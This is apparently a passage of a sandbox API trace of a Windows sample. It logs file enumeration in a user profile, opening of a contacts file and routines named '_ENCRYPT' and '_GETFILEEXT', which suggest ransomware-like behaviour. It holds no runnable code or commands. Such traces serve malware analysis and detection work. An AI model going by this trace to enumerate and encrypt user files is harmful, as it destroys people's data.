ftLastAccessTime.dwHighDateTime=0x1d5e5ba, ftLastWriteTime.dwLowDateTime=0xb5fc0d50, ftLastWriteTime.dwHighDateTime=0x1d5e5ba, nFileSizeHigh=0x0, nFileSizeLow=0xb336, dwReserved0=0x10, dwReserved1=0x657690, cFileName="IoPtJD0U8Gbyjv6.swf", cAlternateFileName="IOPTJD~1.SWF")) returned 1 [0074.643] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f0b07b0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x6c66c1b0, ftLastAccessTime.dwHighDateTime=0x1d5e6cf, ftLastWriteTime.dwLowDateTime=0x6c66c1b0, ftLastWriteTime.dwHighDateTime=0x1d5e6cf, nFileSizeHigh=0x0, nFileSizeLow=0x4606, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="J9c7.avi", cAlternateFileName="")) returned 1 [0074.647] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30f21820, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0xaa5959f0, ftLastAccessTime.dwHighDateTime=0x1d5e504, ftLastWriteTime.dwLowDateTime=0xaa5959f0, ftLastWriteTime.dwHighDateTime=0x1d5e504, nFileSizeHigh=0x0, nFileSizeLow=0x16b05, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Syi8lj9.mkv", cAlternateFileName="")) returned 1 [0074.647] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x1200066, ftCreationTime.dwLowDateTime=0xc3d40, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1280067, nFileSizeHigh=0xc3d40, nFileSizeLow=0x23, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="a\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.647] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.648] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0xf80077, ftCreationTime.dwLowDateTime=0xc3d58, ftCreationTime.dwHighDateTime=0x657690, ftLastAccessTime.dwLowDateTime=0xc3d43, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0xd6310, ftLastWriteTime.dwHighDateTime=0x1220078, nFileSizeHigh=0xc3d58, nFileSizeLow=0x657380, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="眐e\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.648] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0074.648] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0xe40088, ftCreationTime.dwLowDateTime=0xc3d70, ftCreationTime.dwHighDateTime=0x657690, ftLastAccessTime.dwLowDateTime=0xc3d5b, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0xd6310, ftLastWriteTime.dwHighDateTime=0xea0089, nFileSizeHigh=0xc3d70, nFileSizeLow=0x657380, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="眐e\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.648] FindClose (in: hFindFile=0x6b8978 | out: hFindFile=0x6b8978) returned 1 [0074.648] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0074.648] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0074.648] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.650] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0074.658] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.659] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0074.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0074.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0074.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0074.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0074.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0074.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0074.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0074.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0074.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0074.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0074.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0074.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0074.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0074.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0074.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.659] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0074.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0074.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ad18 [0074.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76ad18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0074.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0074.660] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0074.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0074.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0074.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0074.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0074.660] CloseHandle (hObject=0x140) returned 1 [0074.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0074.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6a0990 [0074.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0074.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0074.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0074.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0074.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0074.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0074.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0074.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0074.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0074.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0074.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0074.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0074.683] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0990 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.685] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0074.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0074.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0074.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0074.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0074.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0074.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0074.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0074.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0074.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0074.687] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0074.687] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0074.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0074.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690740 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0074.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0074.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ad60 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d838 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0074.687] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0074.688] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0074.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0074.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690660 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0074.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df40 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d630 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0074.688] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0074.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0074.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0074.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0074.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0074.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0074.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0074.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0074.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0074.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0074.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 